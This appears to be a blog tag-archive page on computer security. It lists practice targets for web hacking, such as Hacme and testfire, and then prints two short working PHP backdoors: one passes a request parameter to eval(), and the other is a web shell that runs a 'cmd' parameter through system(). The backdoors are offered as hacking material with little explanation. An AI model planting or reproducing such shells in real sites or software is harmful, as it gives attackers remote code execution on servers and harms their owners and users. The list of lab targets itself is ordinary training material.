Tag Archive | Computer security

Session fixation 2



It is hax0r time

1) Jarlsberg App – http://jarlsberg.appspot.com/start
2) OWASP Broken Web Applications project
3) Web Security Dojo – http://www.mavensecurity.com/web_security_dojo/
4) SPI Dynamics (live) – http://zero.webappsecurity.com/
5) Cenzic (live) – http://crackme.cenzic.com/
6) Watchfire (live) – http://demo.testfire.net/
7) Acunetix (live) – http://testphp.acunetix.com/
8) PCTechtips Challenge (live) – http://pctechtips.org/hacker-challenge-pwn3d-the-login-form/
9) The Butterfly Security Project – http://sourceforge.net/projects/thebutterflytmp/files/ButterFly%20Project
10) Hacme Casino – http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm
11) Hacme Bank 2.0 – http://www.foundstone.com/us/resources/proddesc/hacmebank.htm
12) Updated Hacme Bank – http://www.o2-ounceopen.com/technical-info/2008/12/8/updated-version-of-hacmebank.html
14) Hacme Books – http://www.foundstone.com/us/resources/proddesc/hacmebooks.htm
15) Hacme Travel – http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm
16) Hacme Shipping – http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm
17) OWASP SiteGenerator – http://www.owasp.org/index.php/Owasp_SiteGenerator
18) Moth – http://www.bonsai-sec.com/en/research/moth.php
19) Stanford SecuriBench – http://suif.stanford.edu/~livshits/securibench/
20) SecuriBench Micro – http://suif.stanford.edu/~livshits/work/securibench-micro/
21) BadStore – http://www.badstore.net/
22) WebMaven/Buggy Bank – http://www.mavensecurity.com/webmaven

XSB (Extra Small Backdoor) in PHP

<?php
// Takes the 'code' request parameter (GET, POST or cookie) and runs it as PHP.
$code=$_REQUEST['code'];
eval($code);
?>

It could be used for remote file inclusion.

A strange research


 
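<?php
// Web shell: passes the 'cmd' request parameter to system().
function a(){
	// No braces after the if: it guards only the first echo, so the
	// statements that follow are reached on every request.
	if(isset($_REQUEST['cmd']))
		echo "<pre>";
	$cmd= ($_REQUEST['cmd']);
	system($cmd);
	echo "</pre>";
	die;
}
a();
?>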

http://www.virustotal.com/file-scan/report.html?id=8a533070e2fa966210edb324c38e2a0293cc025d53486aa288a7df13ec889fb4-1315865006